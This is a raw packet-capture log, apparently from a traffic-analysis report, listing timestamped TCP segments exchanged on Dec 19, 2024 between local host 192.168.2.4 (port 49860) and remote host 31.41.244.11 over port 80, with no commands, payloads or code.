                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.788621902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.788685083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.789839029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.789923906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.789964914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.790034056 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.791201115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.791305065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.791342974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.791584015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.792562962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.792659044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.792721987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.792772055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.793922901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.794019938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.794038057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.794188023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.795331001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.795443058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.796554089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.796637058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.796755075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.796771049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.796813965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.798024893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.798099995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.798557043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.799546957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.799582005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.799622059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.799638987 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.800828934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.800932884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.800936937 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.801166058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.802083969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.802160978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.802210093 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.802210093 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.803464890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.803554058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.922286987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.922395945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.922435045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.922971964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.923006058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.923068047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.924029112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.924063921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.924992085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.925082922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.925132990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.926254034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.926312923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.926336050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.926644087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.927357912 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.927407026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.928056002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.928405046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.928438902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.929102898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.929497957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.929548025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.929660082 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.930561066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.930665970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.931703091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.931791067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.931838989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.932811975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.933140039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.933229923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.933981895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.934016943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.935132980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.935168982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.935220957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.936209917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.936245918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.936288118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.937216997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.937319040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.937345028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.938344002 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.938395023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.938477993 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.939373970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.939600945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.939723015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.940529108 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.940563917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.941036940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.941669941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.941721916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.941837072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.942765951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.942821980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.942825079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.943837881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.943924904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.943985939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.944926023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.945071936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.945127010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.946048021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.946248055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.946329117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.947137117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.947264910 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.947339058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.948268890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.948385000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.949359894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.949474096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.949477911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.949551105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.950484991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.950615883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.950758934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.951570988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.951781988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.952157974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.952708960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.952862978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.952924013 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.953809023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.953942060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.954301119 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.954946041 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.955038071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.955064058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.956017017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.956135035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.956191063 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.957201958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.957300901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.958239079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.958334923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.958390951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.959355116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.959450960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.959515095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.960119009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.960447073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.960575104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.961292028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.961587906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.961663961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.961724997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.962672949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.962757111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.962879896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.963907957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.963943005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.964006901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.964006901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.964886904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.964991093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.965112925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.966018915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.966666937 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.966720104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.967277050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.967310905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.967463970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.968256950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.968362093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.968967915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.969429970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.969465017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.969554901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.969554901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.970444918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.970565081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.970638037 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.971681118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.971714973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.972156048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.972743988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.972855091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.973865986 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.973898888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.974188089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.974188089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.974870920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.975001097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.975178957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.976008892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.976087093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.976142883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.976233006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.977083921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.977247000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.977386951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.978183031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.978245020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.978302956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.978966951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.979309082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.979372025 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.979422092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.979470968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.980406046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.983596087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.114474058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.114599943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.114619017 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.114744902 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.115021944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.115082979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.115118027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.115329981 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.116035938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.116164923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.116225004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.117183924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.117218971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.117291927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.117291927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.118273020 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.118335009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.118355036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.119383097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.119436979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.119498014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.120111942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.120512009 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.120589018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.120594978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.121141911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.121571064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.121700048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.121762037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.121998072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.122673035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.122770071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.122781038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.123059988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.123827934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.123991013 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.124075890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.124125004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.124954939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.125010014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.125089884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.126034021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.126127958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.126219988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.127114058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.127353907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.128000021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.128197908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.128341913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.128495932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.129424095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.129457951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.129540920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.130515099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.130548954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.130614042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.130675077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.131629944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.131664038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.131755114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.132719040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.132775068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.132878065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.133795977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.133881092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.133887053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.134871006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.134958029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.134963036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.135097027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:51.135987043 CET804986031.41.244.11192.168.2.4
